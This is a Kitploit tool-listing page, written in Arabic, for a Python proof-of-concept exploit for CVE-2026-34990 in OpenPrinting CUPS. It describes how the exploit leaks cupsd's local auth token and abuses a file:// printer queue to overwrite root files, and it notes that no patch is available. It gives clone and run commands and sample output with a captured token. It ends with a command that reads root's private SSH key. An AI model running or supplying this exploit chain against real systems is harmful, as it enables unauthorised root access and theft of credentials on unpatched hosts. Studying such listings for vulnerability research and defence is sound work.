Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-34990 — إثبات مفهوم بلغة Python للثغرة CVE-2026-34990 في OpenPrinting CUPS، يجبر cupsd على تسريب رمز مصادقة محلي والكتابة فوق ملفات root عبر قائمة انتظار طابعة file://. | Kitploit
أدوات/GitHubGitHub/ungabunga-ctf/cve-2026-34990
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالمحاكاة الافتراضية للأماناختبار الاختراق
GitHubungabunga-ctf/cve-2026-34990

CVE-2026-34990

إثبات مفهوم بلغة Python للثغرة CVE-2026-34990 في OpenPrinting CUPS، يجبر cupsd على تسريب رمز مصادقة محلي والكتابة فوق ملفات root عبر قائمة انتظار طابعة file://.

عرض المستودع
1منذ 2 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-34990

الوصف

CVE-2026-34990 - في إصدارات OpenPrinting CUPS 2.4.16 وما قبلها، يمكن لمستخدم محلي غير متميز إجبار cupsd على المصادقة مع خدمة IPP محلية يتحكم بها المهاجم باستخدام رمز Authorization: Local ... قابل لإعادة الاستخدام. هذا الرمز كافٍ لتنفيذ طلبات /admin/ على المضيف المحلي، ويمكن للمهاجم دمج CUPS-Create-Local-Printer مع printer-is-shared=true لإنشاء قائمة انتظار file:///... بشكل دائم حتى على الرغم من أن سياسة FileDevice العادية ترفض مثل هذه المعرّفات (URIs). الطباعة إلى قائمة الانتظار تلك تمنح الكتابة التعسفية على ملفات الجذر (root)؛ ويستخدم PoC أدناه هذه البدائية لإسقاط جزء من sudoers وإثبات تنفيذ أوامر الجذر. في وقت النشر، لا توجد تصحيحات متاحة للعموم.

التثبيت

git clone https://github.com/ungabunga-ctf/CVE-2026-34990
cd CVE-2026-34990

التشغيل

python3 CVE-2026-34990.py

مثال

python3 CVE-2026-34990.py
CVE-2026-34990 CUPS PoC
[*] Target file: /etc/sudoers.d/aporter
[*] Starting token capture server...
[+] Captured Local token: 7BD0ECC9D367025E50774E0BB08F7B5E
[*] Creating file:// printer...
[+] Vulnerable!
...
...

ثم:

sudo -n cat /root/.ssh/id_rsa
تنزيل الأداة